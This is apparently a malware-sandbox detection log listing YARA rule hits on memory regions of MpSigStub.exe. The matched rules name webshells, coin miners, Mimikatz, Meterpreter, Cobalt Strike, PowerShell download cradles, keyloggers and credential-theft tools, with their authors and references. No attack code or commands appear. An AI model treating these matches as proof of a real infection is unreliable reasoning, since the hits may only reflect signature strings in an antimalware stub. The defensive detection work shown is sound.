Source: 00000023.00000003.18428865493.0000015B1A381000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000023.00000003.18343611807.0000015B1BD13000.00000004.00000001.sdmp, type: MEMORY Matched rule: Amplia_Security_Tool description = Amplia Security Tool, score =
Source: 00000023.00000003.18322610510.0000015B1A546000.00000004.00000001.sdmp, type: MEMORY Matched rule: RemCom_RemoteCommandExecution date = 2017-12-28, author = Florian Roth, description = Detects strings from RemCom tool, reference = https://goo.gl/tezXZt, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000023.00000003.18282376211.0000015B1C133000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000023.00000003.18282376211.0000015B1C133000.00000004.00000001.sdmp, type: MEMORY Matched rule: PUA_CryptoMiner_Jan19_1 date = 2019-01-31, hash1 = ede858683267c61e710e367993f5e589fcb4b4b57b09d023a67ea63084c54a05, author = Florian Roth, description = Detects Crypto Miner strings, reference = Internal Research
Source: 00000023.00000003.18351572125.0000015B1C174000.00000004.00000001.sdmp, type: MEMORY Matched rule: CredTheft_MSIL_ADPassHunt_2 author = FireEye, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 6efb58cf54d1bb45c057efcfbbd68a93
Source: 00000023.00000003.18306567757.0000015B1C2D4000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000023.00000003.18411594732.0000015B1B2C1000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000023.00000003.18411594732.0000015B1B2C1000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000023.00000003.18304719860.0000015B1B7EB000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: 00000023.00000003.18282718286.0000015B1C174000.00000004.00000001.sdmp, type: MEMORY Matched rule: CredTheft_MSIL_ADPassHunt_2 author = FireEye, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 6efb58cf54d1bb45c057efcfbbd68a93
Source: 00000023.00000003.18310002934.0000015B1B40D000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
Source: 00000023.00000003.18317647190.0000015B1B61C000.00000004.00000001.sdmp, type: MEMORY Matched rule: xtremrat date = 2012-07-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Xtrem RAT v3.5, version = 1.0
Source: 00000023.00000003.18316997643.0000015B1B598000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000023.00000003.18296064516.0000015B1BF22000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000023.00000003.18351179947.0000015B1BCD0000.00000004.00000001.sdmp, type: MEMORY Matched rule: APT_Backdoor_Win_GoRat_Memory author = FireEye, description = Identifies GoRat malware in memory based on strings., reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 3b926b5762e13ceec7ac3a61e85c93bb
Source: 00000023.00000003.18403089371.0000015B1B2C1000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000023.00000003.18403089371.0000015B1B2C1000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000023.00000003.18423819335.0000015B1B1FA000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_PowerShell_IEX_Download_Combo date = 2018-10-04, hash1 = 13297f64a5f4dd9b08922c18ab100d3a3e6fdeab82f60a4653ab975b8ce393d5, author = Florian Roth, description = Detects strings found in sample from CN group repo leak in October 2018, reference = https://twitter.com/JaromirHorejsi/status/1047084277920411648
Source: 00000023.00000003.18423819335.0000015B1B1FA000.00000004.00000001.sdmp, type: MEMORY Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000023.00000003.18423819335.0000015B1B1FA000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000023.00000003.18288987987.0000015B1BAC0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000023.00000003.18288987987.0000015B1BAC0000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_obfuscated_encoding date = 2021/04/18, author = Arnim Rupp, description = PHP webshell obfuscated by encoding, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000023.00000003.18288987987.0000015B1BAC0000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_dynamic_big date = 2021/02/07, author = Arnim Rupp, description = PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000023.00000003.18288987987.0000015B1BAC0000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_by_string_obfuscation date = 2021/01/09, author = Arnim Rupp, description = PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = e4a15637c90e8eabcbdc748366ae55996dbec926382220c423e754bd819d22bc
Source: 00000023.00000003.18294299849.0000015B1C174000.00000004.00000001.sdmp, type: MEMORY Matched rule: CredTheft_MSIL_ADPassHunt_2 author = FireEye, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 6efb58cf54d1bb45c057efcfbbd68a93
Source: 00000023.00000003.18313512818.0000015B1B346000.00000004.00000001.sdmp, type: MEMORY Matched rule: HackTool_MSIL_SharPersist_2 author = FireEye, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 98ecf58d48a3eae43899b45cec0fc6b7
Source: 00000023.00000003.18433793263.0000015B1AEE2000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_PowerShell_IEX_Download_Combo date = 2018-10-04, hash1 = 13297f64a5f4dd9b08922c18ab100d3a3e6fdeab82f60a4653ab975b8ce393d5, author = Florian Roth, description = Detects strings found in sample from CN group repo leak in October 2018, reference = https://twitter.com/JaromirHorejsi/status/1047084277920411648
Source: 00000023.00000003.18325517837.0000015B1BF22000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000023.00000003.18330638755.0000015B1B6A0000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_by_string_obfuscation date = 2021/01/09, author = Arnim Rupp, description = PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = e4a15637c90e8eabcbdc748366ae55996dbec926382220c423e754bd819d22bc
Source: 00000023.00000003.18330638755.0000015B1B6A0000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_asp_generic date = 2021/03/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75
Source: 00000023.00000003.18306868118.0000015B1AA1D000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: 00000023.00000003.18306868118.0000015B1AA1D000.00000004.00000001.sdmp, type: MEMORY Matched rule: APT_DeputyDog_Fexel author = ThreatConnect Intelligence Research Team
Source: 00000023.00000003.18316329497.0000015B1A504000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000023.00000003.18336723789.0000015B1BAC0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000023.00000003.18336723789.0000015B1BAC0000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_obfuscated_encoding date = 2021/04/18, author = Arnim Rupp, description = PHP webshell obfuscated by encoding, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000023.00000003.18336723789.0000015B1BAC0000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_dynamic_big date = 2021/02/07, author = Arnim Rupp, description = PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000023.00000003.18336723789.0000015B1BAC0000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_by_string_obfuscation date = 2021/01/09, author = Arnim Rupp, description = PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = e4a15637c90e8eabcbdc748366ae55996dbec926382220c423e754bd819d22bc
Source: 00000023.00000003.18283593829.0000015B1A80D000.00000004.00000001.sdmp, type: MEMORY Matched rule: Hacktool_Strings_p0wnedShell date = 2017-01-14, hash1 = e1f35310192416cd79e60dba0521fc6eb107f3e65741c344832c46e9b4085e60, author = Florian Roth, description = p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedShell.cs, reference = https://github.com/Cn33liz/p0wnedShell, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000023.00000003.18283593829.0000015B1A80D000.00000004.00000001.sdmp, type: MEMORY Matched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth, description = Detects suspicious PowerShell code that downloads from web sites, type = file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = Internal Research
Source: 00000023.00000003.18283593829.0000015B1A80D000.00000004.00000001.sdmp, type: MEMORY Matched rule: Mimikatz_Memory_Rule_1 date = 12/22/2014, author = Florian Roth, description = Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = memory
Source: 00000023.00000003.18344475813.0000015B1C1D6000.00000004.00000001.sdmp, type: MEMORY Matched rule: Msfpayloads_msf_psh date = 2017-02-09, hash1 = 5cc6c7f1aa75df8979be4a16e36cece40340c6e192ce527771bdd6463253e46f, author = Florian Roth, description = Metasploit Payloads - file msf-psh.vba, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000023.00000003.18432805737.0000015B1BA3B000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_Script_Obfuscation_Char_Concat date = 2018-10-04, hash1 = b30cc10e915a23c7273f0838297e0d2c9f4fc0ac1f56100eef6479c9d036c12b, author = Florian Roth, description = Detects strings found in sample from CN group repo leak in October 2018, reference = https://twitter.com/JaromirHorejsi/status/1047084277920411648
Source: 00000023.00000003.18432805737.0000015B1BA3B000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: 00000023.00000003.18323868678.0000015B1BD96000.00000004.00000001.sdmp, type: MEMORY Matched rule: WScriptShell_Case_Anomaly date = 2017-09-11, author = Florian Roth, description = Detects obfuscated wscript.shell commands, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000023.00000003.18305659214.0000015B1C39B000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000023.00000003.18350449076.0000015B1B6A0000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_by_string_obfuscation date = 2021/01/09, author = Arnim Rupp, description = PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = e4a15637c90e8eabcbdc748366ae55996dbec926382220c423e754bd819d22bc
Source: 00000023.00000003.18350449076.0000015B1B6A0000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_asp_generic date = 2021/03/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75
Source: 00000023.00000003.18427547415.0000015B1B8F2000.00000004.00000001.sdmp, type: MEMORY Matched rule: GoldDragon_Aux_File date = 2018-02-03, author = Florian Roth, description = Detects export from Gold Dragon - February 2018, reference = https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000023.00000003.18427547415.0000015B1B8F2000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000023.00000003.18319632958.0000015B1BDD9000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000023.00000003.18319632958.0000015B1BDD9000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_dynamic_big date = 2021/02/07, author = Arnim Rupp, description = PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000023.00000003.18319632958.0000015B1BDD9000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_by_string_obfuscation date = 2021/01/09, author = Arnim Rupp, description = PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = e4a15637c90e8eabcbdc748366ae55996dbec926382220c423e754bd819d22bc
Source: 00000023.00000003.18319632958.0000015B1BDD9000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
Source: 00000023.00000003.18319632958.0000015B1BDD9000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_asp_generic date = 2021/03/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75
Source: 00000023.00000003.18310362275.0000015B1B490000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000023.00000003.18333848371.0000015B1A546000.00000004.00000001.sdmp, type: MEMORY Matched rule: RemCom_RemoteCommandExecution date = 2017-12-28, author = Florian Roth, description = Detects strings from RemCom tool, reference = https://goo.gl/tezXZt, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000023.00000003.18284892419.0000015B1AF67000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
Source: 00000023.00000003.18284892419.0000015B1AF67000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_PowerShell_IEX_Download_Combo date = 2018-10-04, hash1 = 13297f64a5f4dd9b08922c18ab100d3a3e6fdeab82f60a4653ab975b8ce393d5, author = Florian Roth, description = Detects strings found in sample from CN group repo leak in October 2018, reference = https://twitter.com/JaromirHorejsi/status/1047084277920411648
Source: 00000023.00000003.18284892419.0000015B1AF67000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: 00000023.00000003.18296359788.0000015B1C251000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_Script_Obfuscation_Char_Concat date = 2018-10-04, hash1 = b30cc10e915a23c7273f0838297e0d2c9f4fc0ac1f56100eef6479c9d036c12b, author = Florian Roth, description = Detects strings found in sample from CN group repo leak in October 2018, reference = https://twitter.com/JaromirHorejsi/status/1047084277920411648
Source: 00000023.00000003.18411989385.0000015B1B2C1000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000023.00000003.18411989385.0000015B1B2C1000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000023.00000003.18318342429.0000015B1C460000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
Source: 00000023.00000003.18318342429.0000015B1C460000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000023.00000003.18318342429.0000015B1C460000.00000004.00000001.sdmp, type: MEMORY Matched rule: APT_DeputyDog_Fexel author = ThreatConnect Intelligence Research Team
Source: 00000023.00000003.18431461093.0000015B1B02B000.00000004.00000001.sdmp, type: MEMORY Matched rule: APT9002Strings author = Seth Hardy, description = 9002 Identifying Strings, last_modified = 2014-06-25
Source: 00000023.00000003.18291855169.0000015B1B8B1000.00000004.00000001.sdmp, type: MEMORY Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 00000023.00000003.18291855169.0000015B1B8B1000.00000004.00000001.sdmp, type: MEMORY Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29
Source: 00000023.00000003.18326028548.0000015B1ACB0000.00000004.00000001.sdmp, type: MEMORY Matched rule: RemCom_RemoteCommandExecution date = 2017-12-28, author = Florian Roth, description = Detects strings from RemCom tool, reference = https://goo.gl/tezXZt, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000023.00000003.18285552638.0000015B1B281000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000023.00000003.18341450740.0000015B1B4D3000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000023.00000003.18310667601.0000015B1AD99000.00000004.00000001.sdmp, type: MEMORY Matched rule: Mimikatz_Memory_Rule_1 date = 12/22/2014, author = Florian Roth, description = Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = memory
Source: 00000023.00000003.18310667601.0000015B1AD99000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
Source: 00000023.00000003.18346153630.0000015B1AB4D000.00000004.00000001.sdmp, type: MEMORY Matched rule: Tofu_Backdoor date = 2017-02-28, author = Cylance, description = Detects Tofu Trojan, reference = https://www.cylance.com/en_us/blog/the-deception-project-a-new-japanese-centric-threat.html
Source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR Matched rule: hacktool_macos_keylogger_logkext author = @mimeframe, description = LogKext is an open source keylogger for Mac OS X, a product of FSB software., reference = https://github.com/SlEePlEs5/logKext
Source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR Matched rule: Msfpayloads_msf_psh date = 2017-02-09, hash1 = 5cc6c7f1aa75df8979be4a16e36cece40340c6e192ce527771bdd6463253e46f, author = Florian Roth, description = Metasploit Payloads - file msf-psh.vba, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR Matched rule: HKTL_Meterpreter_inMemory date = 2020-06-29, author = netbiosX, Florian Roth, description = Detects Meterpreter in-memory, reference = https://www.reddit.com/r/purpleteamsec/comments/hjux11/meterpreter_memory_indicators_detection_tooling/, score =
Source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR Matched rule: Base64_PS1_Shellcode date = 2018-11-14, author = Nick Carr, David Ledbetter, description = Detects Base64 encoded PS1 Shellcode, reference = https://twitter.com/ItsReallyNick/status/1062601684566843392, score =
Source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR Matched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
Source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR Matched rule: Tofu_Backdoor date = 2017-02-28, author = Cylance, description = Detects Tofu Trojan, reference = https://www.cylance.com/en_us/blog/the-deception-project-a-new-japanese-centric-threat.html
Source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR Matched rule: Hacktool_Strings_p0wnedShell date = 2017-01-14, hash1 = e1f35310192416cd79e60dba0521fc6eb107f3e65741c344832c46e9b4085e60, author = Florian Roth, description = p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedShell.cs, reference = https://github.com/Cn33liz/p0wnedShell, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR Matched rule: Keylogger_CN_APT date = 2016-03-07, author = Florian Roth, description = Keylogger - generic rule for a Chinese variant, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 3efb3b5be39489f19d83af869f11a8ef8e9a09c3c7c0ad84da31fc45afcf06e7
Source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR Matched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth, description = Detects suspicious PowerShell code that downloads from web sites, type = file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = Internal Research
Source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR Matched rule: ZxShell_Jul17 date = 2017-07-08, hash1 = 5d2a4cde9fa7c2fdbf39b2e2ffd23378d0c50701a3095d1e91e3cf922d7b0b16, author = Florian Roth, description = Detects a ZxShell - CN threat group, reference = https://blogs.rsa.com/cat-phishing/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR Matched rule: DeepPanda_htran_exe date = 2015/02/08, author = Florian Roth, description = Hack Deep Panda - htran-exe, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 38e21f0b87b3052b536408fdf59185f8b3d210b9
Source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR Matched rule: WindowsCredentialEditor threat_level = , description = Windows Credential Editor
